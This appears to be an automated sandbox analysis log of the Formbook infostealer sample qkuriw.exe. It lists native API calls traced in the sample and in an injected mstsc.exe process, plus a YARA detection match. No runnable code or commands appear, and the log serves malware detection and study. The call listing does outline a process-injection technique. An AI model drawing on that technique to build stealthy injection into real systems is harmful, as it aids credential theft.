            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AAA3B0 NtGetContextThread,0_2_01AAA3B0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9B00 NtSetValueKey,0_2_01AA9B00
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9A80 NtOpenDirectoryObject,0_2_01AA9A80
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9A10 NtQuerySection,0_2_01AA9A10
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA95F0 NtQueryInformationFile,0_2_01AA95F0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9520 NtWaitForSingleObject,0_2_01AA9520
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AAAD30 NtSetContextThread,0_2_01AAAD30
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9560 NtWriteFile,0_2_01AA9560
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9FE0 NtCreateMutant,0_2_01AA9FE0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9730 NtQueryVirtualMemory,0_2_01AA9730
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AAA710 NtOpenProcessToken,0_2_01AAA710
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9760 NtOpenProcess,0_2_01AA9760
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9770 NtSetInformationFile,0_2_01AA9770
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AAA770 NtOpenThread,0_2_01AAA770
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA96D0 NtCreateKey,0_2_01AA96D0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9610 NtEnumerateValueKey,0_2_01AA9610
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9670 NtQueryInformationProcess,0_2_01AA9670
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01AA9650 NtQueryValueKey,0_2_01AA9650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069540 NtReadFile,LdrInitializeThunk,4_2_05069540
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069560 NtWriteFile,LdrInitializeThunk,4_2_05069560
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050695D0 NtClose,LdrInitializeThunk,4_2_050695D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069710 NtQueryInformationToken,LdrInitializeThunk,4_2_05069710
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069770 NtSetInformationFile,LdrInitializeThunk,4_2_05069770
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069780 NtMapViewOfSection,LdrInitializeThunk,4_2_05069780
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069FE0 NtCreateMutant,LdrInitializeThunk,4_2_05069FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069610 NtEnumerateValueKey,LdrInitializeThunk,4_2_05069610
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069650 NtQueryValueKey,LdrInitializeThunk,4_2_05069650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05069660
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050696D0 NtCreateKey,LdrInitializeThunk,4_2_050696D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050696E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_050696E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_05069910
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050699A0 NtCreateSection,LdrInitializeThunk,4_2_050699A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069840 NtDelayExecution,LdrInitializeThunk,4_2_05069840
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069860 NtQuerySystemInformation,LdrInitializeThunk,4_2_05069860
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A50 NtCreateFile,LdrInitializeThunk,4_2_05069A50
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069520 NtWaitForSingleObject,4_2_05069520
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506AD30 NtSetContextThread,4_2_0506AD30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050695F0 NtQueryInformationFile,4_2_050695F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506A710 NtOpenProcessToken,4_2_0506A710
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069730 NtQueryVirtualMemory,4_2_05069730
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069760 NtOpenProcess,4_2_05069760
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506A770 NtOpenThread,4_2_0506A770
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050697A0 NtUnmapViewOfSection,4_2_050697A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069670 NtQueryInformationProcess,4_2_05069670
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069950 NtQueueApcThread,4_2_05069950
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050699D0 NtCreateProcessEx,4_2_050699D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069820 NtEnumerateKey,4_2_05069820
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506B040 NtSuspendThread,4_2_0506B040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050698A0 NtWriteVirtualMemory,4_2_050698A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050698F0 NtReadVirtualMemory,4_2_050698F0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069B00 NtSetValueKey,4_2_05069B00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0506A3B0 NtGetContextThread,4_2_0506A3B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A00 NtProtectVirtualMemory,4_2_05069A00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A10 NtQuerySection,4_2_05069A10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A20 NtResumeThread,4_2_05069A20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05069A80 NtOpenDirectoryObject,4_2_05069A80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A190 NtAllocateVirtualMemory,4_2_0306A190
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A060 NtReadFile,4_2_0306A060
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A0E0 NtClose,4_2_0306A0E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03069FB0 NtCreateFile,4_2_03069FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A18A NtAllocateVirtualMemory,4_2_0306A18A
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306A0DA NtClose,4_2_0306A0DA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03069FAA NtCreateFile,4_2_03069FAA
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123E1150_2_0123E115
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_012210300_2_01221030
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123D2030_2_0123D203
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DD3C0_2_0123DD3C
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222D870_2_01222D87
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222D900_2_01222D90
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DCB50_2_0123DCB5
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DFAC0_2_0123DFAC
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01222FB00_2_01222FB0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123DF860_2_0123DF86
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01229FC00_2_01229FC0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_0123D6190_2_0123D619
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A841200_2_01A84120
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A6F9000_2_01A6F900
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A920A00_2_01A920A0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B320A80_2_01B320A8
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7B0900_2_01A7B090
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B328EC0_2_01B328EC
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B210020_2_01B21002
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A9EBB00_2_01A9EBB0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B2DBD20_2_01B2DBD2
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32B280_2_01B32B28
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B322AE0_2_01B322AE
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A925810_2_01A92581
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7D5E00_2_01A7D5E0
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B325DD0_2_01B325DD
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A60D200_2_01A60D20
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32D070_2_01B32D07
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B31D550_2_01B31D55
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A7841F0_2_01A7841F
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B2D4660_2_01B2D466
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B31FF10_2_01B31FF1
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01B32EF70_2_01B32EF7
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: 0_2_01A86E300_2_01A86E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2D074_2_050F2D07
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05020D204_2_05020D20
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F1D554_2_050F1D55
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050525814_2_05052581
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F25DD4_2_050F25DD
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503D5E04_2_0503D5E0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503841F4_2_0503841F
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050ED4664_2_050ED466
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F1FF14_2_050F1FF1
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050ED6164_2_050ED616
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_05046E304_2_05046E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2EF74_2_050F2EF7
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0502F9004_2_0502F900
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050441204_2_05044120
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050E10024_2_050E1002
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0503B0904_2_0503B090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050520A04_2_050520A0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F20A84_2_050F20A8
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F28EC4_2_050F28EC
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F2B284_2_050F2B28
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0505EBB04_2_0505EBB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050EDBD24_2_050EDBD2
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_050F22AE4_2_050F22AE
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306D2034_2_0306D203
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052FB04_2_03052FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03059FC04_2_03059FC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0306D6194_2_0306D619
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052D874_2_03052D87
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_03052D904_2_03052D90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0502B150 appears 35 times
            Source: C:\Users\user\Desktop\qkuriw.exeCode function: String function: 01A6B150 appears 35 times
            Source: qkuriw.exeStatic PE information: No import functions for PE file found
            Source: qkuriw.exe, 00000000.00000002.1326816190.0000000001B5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qkuriw.exe
            Source: qkuriw.exe, 00000000.00000003.1323896342.0000000003C13000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs qkuriw.exe
            Source: qkuriw.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version =